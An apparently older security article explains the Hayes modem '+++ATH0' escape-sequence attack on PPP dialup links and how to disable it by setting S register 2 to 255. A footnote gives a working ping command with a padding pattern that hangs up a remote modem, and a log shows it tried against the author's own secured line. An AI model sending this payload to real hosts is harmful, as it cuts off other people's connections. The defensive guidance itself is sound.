This attack works because the PPP driver expects the modem to pass the string "+++" unchanged to the other side, while the modem interprets it as the 'escape string' - a request to exit from data mode and accept a command. Once the modem is in command mode, the string ATH0 instructs it to hang up immediately1.

With most modern modems, it's easy to protect yourself from such an attack2. Almost all modems nowadays are Hayes compatible, and allow the user to remap the escape character using S register number 2. The escape string is always a sequence of three escape characters, but the escape character may be changed from the default of 0x2B ("+") to anything from 0x00 to 0x7F, by setting the S register to the decimal value of the required character. Decimal values of 128-255 disable the escape sequence completely.

Most PPP implementations do not use the escape sequence at all - to hang up the modem they drop the DTR signal, which (depending on the modem) is interpreted as a request to hang up or reset. Therefore, there is no loss of function in disabling the escape sequence on a modem that is used solely to access the internet.

To disable the escape sequence (and therefore protect your modem against this attack), add the string "S02=255" to the end of your modem's init string. If it has no init string set, use the string "ATS02=255".

In Windows NTs, the init string can be set in the device manager properties for the modem, under 'Advanced', 'Extra initialization commands'. In Windows 9xes, the init string can be set in the dial-up-networking properties for each connection, under 'Advanced Connection Settings', 'Extra settings'. Most unixes have a different way of setting the initialization string - have a look in the manual if you can't find it in the PPP configuration program.


1 - The attack, as stated above, does not actually hang up the modem. Modem commands must end in a carriage return character (0x0D). The above attack is arguably worse, as it leaves the modem in a state where attempts to re-dial or reset the modem may not work without human intervention. To ping a modem and hang it up, use "ping -c 5 -p 2B2B2B415448290D <target IP address>".

2 - Actual results of carrying out the ping exploit from a shell account to my (secured) dialup :

lj@warspite.inf.ed.ac.uk$ ping -c 5 -p 2B2B2B41544829 modem-2940.wolf.dialup.pol.co.uk
PATTERN: 0x2b2b2b41544829
PING modem-2940.wolf.dialup.pol.co.uk (81.76.139.124) from 129.215.32.201 : 56(84) bytes of data.
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=1 ttl=53 time=165 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=2 ttl=53 time=166 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=3 ttl=53 time=163 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=4 ttl=53 time=167 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=5 ttl=53 time=169 ms

--- modem-2940.wolf.dialup.pol.co.uk ping statistics ---
5 packets transmitted, 5 received, 0% loss, time 4040ms
rtt min/avg/max/mdev = 163.473/166.507/169.860/2.068 ms